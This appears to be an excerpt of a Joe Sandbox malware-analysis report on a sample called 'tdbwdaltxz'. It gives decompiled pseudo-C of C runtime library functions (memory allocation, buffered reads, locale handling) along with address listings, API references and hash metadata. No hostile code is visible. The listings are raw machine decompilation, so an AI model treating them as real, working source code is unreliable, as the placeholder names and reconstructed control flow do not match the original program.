					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t45;
				if(_t45 == 0) {
					L38:
					_pop(_t90);
					_pop(_t94);
					_pop(_t72);
					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
				} else {
					_t16 = _t45 + _t45 + 8; // 0x8
					asm("sbb eax, eax");
					_t48 = _t45 + _t45 & _t16;
					if(_t48 == 0) {
						_t95 = 0;
						L36:
						_t73 = 0;
						L37:
						E00407EE5(_t95);
						_t45 = _t73;
						goto L38;
					}
					if(_t48 > 0x400) {
						_t95 = E00407D48(_t48);
						if(_t95 == 0) {
							goto L36;
						}
						 *_t95 = 0xdddd;
						L12:
						if(_t95 == 0) {
							goto L36;
						}
						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L36;
						}
						_t91 = _v12;
						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
						if(_t73 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t30 = _t73 + _t73 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t73 + _t73 & _t30;
							if(_t55 == 0) {
								_t92 = 0;
								L34:
								E00407EE5(_t92);
								goto L36;
							}
							if(_t55 > 0x400) {
								_t92 = E00407D48(_t55);
								if(_t92 == 0) {
									goto L34;
								}
								 *_t92 = 0xdddd;
								L26:
								_t92 = _t92 + 8;
								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t73);
									_push(_t92);
									_push(0);
									_push(_a32);
									_t73 = E00407464();
									if(_t73 == 0) {
										goto L34;
									} else {
										E00407EE5(_t92);
										goto L37;
									}
								}
							}
							E004018F0(_t55);
							_t92 = _t100;
							if(_t92 == 0) {
								goto L34;
							}
							 *_t92 = 0xcccc;
							goto L26;
						}
						_t64 = _a28;
						if(_t64 == 0) {
							goto L37;
						}
						if(_t73 > _t64) {
							goto L36;
						}
						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
						if(_t73 != 0) {
							goto L37;
						}
						goto L36;
					}
					E004018F0(_t48);
					_t95 = _t98;
					if(_t95 == 0) {
						goto L36;
					}
					 *_t95 = 0xcccc;
					goto L12;
				}
			}




























                        0x00409ac5
                        0x00409ac6
                        0x00409ac7
                        0x00409ace
                        0x00409ad4
                        0x00409ad9
                        0x00409adf
                        0x00409ae5
                        0x00409ae8
                        0x00409ae8
                        0x00409aeb
                        0x00409aed
                        0x00409aed
                        0x00409aeb
                        0x00409aef
                        0x00409af4
                        0x00409afb
                        0x00409afe
                        0x00409afe
                        0x00409b1a
                        0x00409b1f
                        0x00409b22
                        0x00409b27
                        0x00409c9d
                        0x00409ca0
                        0x00409ca1
                        0x00409ca2
                        0x00409cae
                        0x00409b2d
                        0x00409b2f
                        0x00409b34
                        0x00409b36
                        0x00409b38
                        0x00409c90
                        0x00409c92
                        0x00409c92
                        0x00409c94
                        0x00409c95
                        0x00409c9b
                        0x00000000
                        0x00409c9b
                        0x00409b43
                        0x00409b62
                        0x00409b67
                        0x00000000
                        0x00000000
                        0x00409b6d
                        0x00409b73
                        0x00409b78
                        0x00000000
                        0x00000000
                        0x00409b89
                        0x00409b8e
                        0x00409b93
                        0x00000000
                        0x00000000
                        0x00409b99
                        0x00409bb0
                        0x00409bb4
                        0x00000000
                        0x00000000
                        0x00409bc2
                        0x00409bff
                        0x00409c04
                        0x00409c06
                        0x00409c08
                        0x00409c85
                        0x00409c87
                        0x00409c88
                        0x00000000
                        0x00409c8d
                        0x00409c0c
                        0x00409c27
                        0x00409c2c
                        0x00000000
                        0x00000000
                        0x00409c2e
                        0x00409c34
                        0x00409c34
                        0x00409c39
                        0x00000000
                        0x00409c55
                        0x00409c57
                        0x00409c58
                        0x00409c5c
                        0x00409c7d
                        0x00409c80
                        0x00409c5e
                        0x00409c5e
                        0x00409c5f
                        0x00409c5f
                        0x00409c60
                        0x00409c61
                        0x00409c62
                        0x00409c63
                        0x00409c6b
                        0x00409c72
                        0x00000000
                        0x00409c74
                        0x00409c75
                        0x00000000
                        0x00409c7a
                        0x00409c72
                        0x00409c39
                        0x00409c0e
                        0x00409c13
                        0x00409c17
                        0x00000000
                        0x00000000
                        0x00409c19
                        0x00000000
                        0x00409c19
                        0x00409bc4
                        0x00409bc9
                        0x00000000
                        0x00000000
                        0x00409bd1
                        0x00000000
                        0x00000000
                        0x00409bed
                        0x00409bf1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00409bf7
                        0x00409b45
                        0x00409b4a
                        0x00409b4e
                        0x00000000
                        0x00000000
                        0x00409b54
                        0x00000000
                        0x00409b54

                        APIs
                        • __alloca_probe_16.LIBCMT ref: 00409B45
                        • __alloca_probe_16.LIBCMT ref: 00409C0E
                        • __freea.LIBCMT ref: 00409C75
                          • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                        • __freea.LIBCMT ref: 00409C88
                        • __freea.LIBCMT ref: 00409C95
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                        • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                        • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                        • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010630B6 Relevance: 7.7, APIs: 5, Instructions: 162COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E010630B6(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E01066CE0(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E01066B25(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E01066CE0(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
												L4:
												E0106471D();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E01065573(_t119));
											_t88 = E01066E85();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E01066C53(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E010647CC(_t124))) = 0x16;
				goto L4;
			}



























                        0x010630c0
                        0x010630c3
                        0x010630c9
                        0x010630cc
                        0x010630cf
                        0x010630ec
                        0x00000000
                        0x010630ec
                        0x010630d1
                        0x010630d6
                        0x00000000
                        0x00000000
                        0x010630d8
                        0x010630da
                        0x010630f3
                        0x010630f6
                        0x010630f8
                        0x01063106
                        0x01063106
                        0x0106310a
                        0x01063112
                        0x01063117
                        0x01063117
                        0x0106311a
                        0x0106311c
                        0x00000000
                        0x0106311e
                        0x01063126
                        0x01063128
                        0x00000000
                        0x00000000
                        0x0106312a
                        0x0106312d
                        0x01063130
                        0x01063137
                        0x01063139
                        0x01063140
                        0x0106313b
                        0x0106313b
                        0x0106313b
                        0x01063145
                        0x01063148
                        0x0106314a
                        0x01063233
                        0x00000000
                        0x01063150
                        0x01063150
                        0x01063150
                        0x01063157
                        0x01063198
                        0x01063198
                        0x0106319a
                        0x01063205
                        0x0106320b
                        0x0106320e
                        0x01063265
                        0x00000000
                        0x0106326b
                        0x01063210
                        0x01063213
                        0x01063215
                        0x0106323b
                        0x0106323b
                        0x0106323f
                        0x01063249
                        0x0106324e
                        0x01063256
                        0x010630e7
                        0x010630e7
                        0x00000000
                        0x010630e7
                        0x01063217
                        0x0106321a
                        0x0106321d
                        0x0106321e
                        0x0106321e
                        0x0106321f
                        0x01063222
                        0x01063225
                        0x01063228
                        0x00000000
                        0x01063228
                        0x0106319c
                        0x0106319e
                        0x010631c2
                        0x010631c7
                        0x010631cd
                        0x010631cf
                        0x010631cf
                        0x010631a0
                        0x010631a2
                        0x010631a8
                        0x010631ba
                        0x010631ba
                        0x010631ba
                        0x010631bc
                        0x010631aa
                        0x010631af
                        0x010631b1
                        0x010631b1
                        0x010631be
                        0x010631be
                        0x010631d1
                        0x010631d4
                        0x00000000
                        0x010631d6
                        0x010631d6
                        0x010631d7
                        0x010631e1
                        0x010631e2
                        0x010631e7
                        0x010631ea
                        0x010631ec
                        0x01063273
                        0x00000000
                        0x01063273
                        0x010631f2
                        0x010631f5
                        0x01063261
                        0x01063261
                        0x01063261
                        0x01063261
                        0x00000000
                        0x01063261
                        0x010631f7
                        0x010631f7
                        0x010631f9
                        0x010631f9
                        0x010631fc
                        0x010631ff
                        0x00000000
                        0x010631ff
                        0x010631d4
                        0x01063159
                        0x0106315c
                        0x0106315f
                        0x01063161
                        0x00000000
                        0x00000000
                        0x01063163
                        0x00000000
                        0x00000000
                        0x01063169
                        0x0106316b
                        0x0106316d
                        0x0106316f
                        0x0106316f
                        0x01063172
                        0x01063175
                        0x01063177
                        0x00000000
                        0x0106317d
                        0x01063184
                        0x01063189
                        0x0106318c
                        0x0106318f
                        0x01063192
                        0x01063194
                        0x00000000
                        0x01063194
                        0x0106322b
                        0x0106322b
                        0x0106322b
                        0x00000000
                        0x01063150
                        0x0106314a
                        0x0106311c
                        0x010630ff
                        0x01063102
                        0x01063104
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01063104
                        0x010630dc
                        0x010630e1
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: 717025f009bde6d845ee9a5dea9d94caa0b4e5ea05f21ed46d7a92af5e39d36a
                        • Instruction ID: 47125dbbc1637f519ac1ec5c5d3dfcc313eff5748792c674951d0e5a43ac30be
                        • Opcode Fuzzy Hash: 717025f009bde6d845ee9a5dea9d94caa0b4e5ea05f21ed46d7a92af5e39d36a
                        • Instruction Fuzzy Hash: 5D51C630A00706DBEB548FAD88846AE7BF9BF51320F148769E9A99E2D0D7719954CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106C92A Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E0106C92A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1081688, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1081c20 - _t7;
								if(__eflags == 0) {
									_t9 = E010647CC(__eflags);
									 *_t9 = E01064825(GetLastError());
									goto L17;
								} else {
									__eflags = E0106CE35(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E010647CC(__eflags);
										 *_t12 = E01064825(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0106CE35(_t6, _t31);
						 *((intOrPtr*)(E010647CC(__eflags))) = 0xc;
						goto L12;
					} else {
						E01064ED2(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0106C898(__ebx, __edx, __edi, _a8);
				}
			}









                        0x0106c931
                        0x0106c93f
                        0x0106c942
                        0x0106c944
                        0x0106c953
                        0x0106c986
                        0x0106c986
                        0x0106c989
                        0x00000000
                        0x00000000
                        0x0106c956
                        0x0106c958
                        0x0106c95a
                        0x0106c95a
                        0x0106c95a
                        0x0106c967
                        0x0106c96d
                        0x0106c96f
                        0x0106c971
                        0x0106c9d1
                        0x0106c9d1
                        0x0106c973
                        0x0106c973
                        0x0106c979
                        0x0106c9bb
                        0x0106c9cf
                        0x00000000
                        0x0106c97b
                        0x0106c982
                        0x0106c984
                        0x0106c9a3
                        0x0106c9b7
                        0x0106c99d
                        0x0106c99d
                        0x0106c99d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0106c984
                        0x0106c979
                        0x00000000
                        0x0106c99f
                        0x0106c98c
                        0x0106c997
                        0x00000000
                        0x0106c946
                        0x0106c949
                        0x0106c94f
                        0x0106c94f
                        0x0106c9a0
                        0x0106c9a2
                        0x0106c933
                        0x0106c93d
                        0x0106c93d

                        APIs
                        • _malloc.LIBCMT ref: 0106C936
                          • Part of subcall function 0106C898: __FF_MSGBANNER.LIBCMT ref: 0106C8AF
                          • Part of subcall function 0106C898: __NMSG_WRITE.LIBCMT ref: 0106C8B6
                          • Part of subcall function 0106C898: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,01064F6A,00000000,00000000,00000000,00000000,?,01064E22,00000018,0107E060), ref: 0106C8DB
                        • _free.LIBCMT ref: 0106C949
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocHeap_free_malloc
                        • String ID:
                        • API String ID: 2734353464-0
                        • Opcode ID: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction ID: dc3f8c792e18c9b39980655d1c4aa36fb946f7055c4604235f5f4dabf39aaf76
                        • Opcode Fuzzy Hash: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction Fuzzy Hash: C611C632905317AFEB322FB8AD4C69E37ECAF142B0B104566F9C9DA140DB358850C7E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106D939 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E0106D939(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x107e2f0);
				E010668F0(__ebx, __edi, __esi);
				_t31 = E0106B2AD(__edx, __edi, _t35);
				_t25 =  *0x1080e04; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E01064D39(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10806ac; // 0x10809a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10809a8;
								if(__eflags != 0) {
									E01064ED2(_t33);
								}
							}
						}
						_t20 =  *0x10806ac; // 0x10809a8
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10806ac; // 0x10809a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0106D9D5();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E0106526F(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E01066935(_t33);
			}









                        0x0106d939
                        0x0106d939
                        0x0106d939
                        0x0106d939
                        0x0106d93b
                        0x0106d940
                        0x0106d94a
                        0x0106d94c
                        0x0106d955
                        0x0106d976
                        0x0106d97c
                        0x0106d980
                        0x0106d983
                        0x0106d986
                        0x0106d98c
                        0x0106d98e
                        0x0106d990
                        0x0106d999
                        0x0106d99b
                        0x0106d99d
                        0x0106d9a3
                        0x0106d9a6
                        0x0106d9ab
                        0x0106d9a3
                        0x0106d99b
                        0x0106d9ac
                        0x0106d9b1
                        0x0106d9b4
                        0x0106d9ba
                        0x0106d9be
                        0x0106d9be
                        0x0106d9c4
                        0x0106d9cb
                        0x0106d95d
                        0x0106d95d
                        0x0106d95d
                        0x0106d960
                        0x0106d962
                        0x0106d966
                        0x0106d96b
                        0x0106d973

                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __amsg_exit.LIBCMT ref: 0106D966
                        • __lock.LIBCMT ref: 0106D976
                        • InterlockedDecrement.KERNEL32(?), ref: 0106D993
                        • _free.LIBCMT ref: 0106D9A6
                        • InterlockedIncrement.KERNEL32(010809A8), ref: 0106D9BE
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 1231874560-0
                        • Opcode ID: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction ID: b9d5ca4917e66ae5fc41927d23d8c33c99505101a283fcf1d3cb919651eef13f
                        • Opcode Fuzzy Hash: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction Fuzzy Hash: BD01D672F006229FDB71BFA894047AE7BA9BF05720F140145E8C0B7284C7345540CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010753DE Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E010753DE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_push(0xc);
				_push(0x107e4d8);
				E010668F0(__ebx, __edi, __esi);
				_t35 = E0106B2AD(__edx, __edi, _t39);
				_t37 = E01064F0A(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E010702E6(__ebx, __edx, _t35, _t37, __eflags);
					E0106D939(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E01064D39(0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E01070061( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E01075A98();
					E01064D39(0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E01075AA4();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E010647CC(_t40))) = 0xc;
					_t24 = 0;
				}
				return E01066935(_t24);
			}








                        0x010753de
                        0x010759fe
                        0x01075a00
                        0x01075a05
                        0x01075a0f
                        0x01075a1c
                        0x01075a1e
                        0x01075a21
                        0x01075a23
                        0x01075a34
                        0x01075a39
                        0x01075a41
                        0x01075a46
                        0x01075a4b
                        0x01075a51
                        0x01075a51
                        0x01075a51
                        0x01075a57
                        0x01075a5d
                        0x01075a64
                        0x01075a6b
                        0x01075a71
                        0x01075a7b
                        0x01075a81
                        0x01075a88
                        0x01075a8d
                        0x01075a25
                        0x01075a2a
                        0x01075a30
                        0x01075a30
                        0x01075a94

                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __calloc_crt.LIBCMT ref: 01075A15
                          • Part of subcall function 01064F0A: __calloc_impl.LIBCMT ref: 01064F19
                          • Part of subcall function 01064F0A: Sleep.KERNEL32(00000000), ref: 01064F30
                        • __lock.LIBCMT ref: 01075A4B
                        • ___addlocaleref.LIBCMT ref: 01075A57
                        • __lock.LIBCMT ref: 01075A6B
                        • InterlockedIncrement.KERNEL32(?), ref: 01075A7B
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                        • String ID:
                        • API String ID: 2144732038-0
                        • Opcode ID: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction ID: 1043acd6d51f1a49f064483d55129c3b0f617311525d146038d6eae68df51e63
                        • Opcode Fuzzy Hash: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction Fuzzy Hash: 59015A71E41303EEE721BFA498457DC77A0AF65B20F204659E4D4AA2C0CE7559418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404751 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                        Download Yara Rule
                        C-Code - Quality: 89%
                        			E00404751(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t41;
				intOrPtr* _t42;
				WCHAR* _t47;
				intOrPtr _t52;
				void* _t55;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t64;

				_t55 = __edx;
				_t57 = _a4;
				if(_t57 != 0) {
					if(_t57 == 2 || _t57 == 1) {
						GetModuleFileNameW(0, 0x415d20, 0x104);
						 *0x415f88 = 0x415d20;
						_t47 =  *0x415f9c; // 0xeb1c56
						if(_t47 == 0 ||  *_t47 == 0) {
							_t47 = 0x415d20;
						}
						_v8 = 0;
						_v16 = 0;
						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
						if(_t61 != 0) {
							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
							if(_t57 != 1) {
								_push( &_v12);
								_v12 = 0;
								_t58 = E00406A91(0, _t55, _t57, _t61);
								if(_t58 == 0) {
									_t56 = _v12;
									_t52 = 0;
									_t33 = _t56;
									if( *_t56 == 0) {
										L17:
										 *0x415f8c = _t52;
										_v12 = 0;
										 *0x415f94 = _t56;
										E0040650B(0);
										_t58 = 0;
										L18:
										_v12 = 0;
										E0040650B(_t61);
										_t36 = _t58;
